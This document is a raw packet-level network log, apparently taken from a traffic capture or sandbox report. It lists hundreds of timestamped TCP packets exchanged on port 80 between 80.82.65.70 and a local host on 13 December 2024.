                                              Dec 13, 2024 10:49:17.241940022 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.241952896 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.241993904 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.242011070 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.242805004 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.242818117 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.242861032 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.243964911 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.243976116 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.244019985 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.327280045 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.327297926 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.327594995 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.327626944 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.327649117 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.328095913 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.328634024 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.328645945 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.328836918 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.329464912 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.329513073 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.329595089 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.330306053 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.330487013 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.330512047 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.331347942 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.331361055 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.331624031 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.332361937 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.332374096 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.332468033 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.333134890 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.333501101 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.333632946 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.334048986 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.334196091 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.334429026 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.334913015 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.335033894 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.335130930 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.335822105 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.335942984 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.335968018 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.336060047 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.336827993 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.336839914 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.336886883 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.337805033 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.337817907 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.337876081 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.338741064 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.338759899 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.339052916 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.339665890 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.339678049 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.339770079 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.340562105 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.340579033 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.340624094 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.340624094 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.341567039 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.341579914 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.341630936 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.341684103 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.342559099 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.342564106 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.342627048 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.343283892 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.343306065 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.343365908 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.344331980 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.344346046 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.344396114 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.345098972 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.345299959 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.345344067 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.345411062 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.346014977 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.346097946 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.346196890 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.346256018 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.347032070 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.347043991 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.347103119 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.347831964 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.348211050 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.409070969 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.409310102 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.409427881 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.409538031 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.409609079 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.409684896 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.409782887 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.410468102 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.410582066 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.410666943 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.411583900 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.411807060 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.411835909 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.411849022 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.412134886 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.412652969 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.412719011 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.412739038 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.412950039 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.413626909 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.413640022 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.413816929 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.414645910 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.414659023 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.414720058 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.414720058 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.415386915 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.415411949 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.415467024 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.415467024 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.416562080 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.416579008 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.416647911 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.416647911 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.417327881 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.417346001 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.417392969 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.417392969 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.418390989 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.418409109 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.418653965 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.419002056 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.419075012 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.419128895 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.420104027 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.420120955 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.420274019 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.420886993 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.421120882 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.421169043 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.421231031 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.421883106 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.421999931 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.422106028 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.422262907 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.422907114 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.422925949 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.423010111 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.423693895 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.423809052 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.423907042 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.424050093 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.424581051 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.424639940 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.424666882 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.424797058 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.425560951 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.425679922 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.425712109 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.425839901 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.426404953 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.426528931 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.426738024 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.426867008 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.427340984 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.427440882 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.427467108 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.427494049 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.428615093 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.428631067 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.428798914 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.429689884 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.429714918 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.429775953 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.429775953 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.430242062 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.430244923 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.430526972 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.431056023 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.431178093 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.431222916 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.431319952 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.431958914 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.432082891 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.432105064 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.432241917 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.432923079 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.433070898 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.433522940 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.434005022 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.434020042 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.434082985 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.434082985 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.435029984 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.435045958 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.435106039 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.435724020 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.435738087 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.435807943 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.519073963 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.519171000 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.519198895 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.519447088 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.519587994 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.519617081 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.519635916 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.520075083 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.520576000 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.520664930 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.520817995 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.521456957 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.521766901 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.521806002 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.521892071 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.522612095 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.522628069 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.522954941 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.523308039 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.523462057 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.523493052 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.523564100 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.524382114 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.524396896 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.524518013 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.525208950 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.525312901 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.525432110 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.525486946 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.526326895 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.526341915 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.526540995 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.527174950 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.527188063 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.527250051 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.527250051 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.527973890 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.528067112 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.528100967 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.528150082 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.528886080 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.528944969 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.529027939 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.529088974 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.529783010 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.529974937 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.530004978 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.530059099 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.530761003 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.530802011 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.530822992 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.530929089 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.531625032 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.531697989 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.531847000 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.531940937 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.532680035 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.532798052 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.532824039 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.532866001 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.533438921 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.533545017 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.533617973 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.533698082 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.534564972 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.534622908 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.534642935 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.534944057 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.535303116 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.535361052 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.535554886 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.536360979 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.536372900 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.536421061 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.536501884 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.537175894 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.537237883 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.537427902 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.537487030 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.538430929 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.538443089 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.538496971 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.539366007 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.539437056 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.539462090 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.539561987 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.540282965 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.540498018 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.601051092 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.601151943 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.601166010 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.601257086 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.601442099 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.601672888 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.601696014 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.601757050 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.601778984 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.602078915 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.602565050 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.602791071 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.602837086 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.603490114 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.603624105 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.603770018 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.603844881 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.604413033 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.604605913 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.604820967 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.605309963 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.605370998 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.605482101 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.605576992 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.606378078 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.606396914 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.606455088 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.607162952 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.607358932 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.607383013 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.607453108 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.608151913 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.608202934 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.608628988 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.608767033 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.609076977 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.609126091 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.609137058 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.609386921 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.610066891 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.610083103 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.610809088 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.610896111 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.610975981 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.611076117 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.611746073 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.611797094 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.611869097 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.612014055 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.612696886 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.612747908 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.612823963 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.612947941 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.613578081 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.613627911 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.613980055 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.614141941 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.614576101 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.614756107 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.614819050 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.615063906 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.615588903 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.615602970 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.615689993 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.616393089 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.616511106 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.616565943 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.617495060 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.617507935 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.617571115 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.617571115 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.618292093 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.618362904 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.618376017 CET804985880.82.65.70192.168.2.6
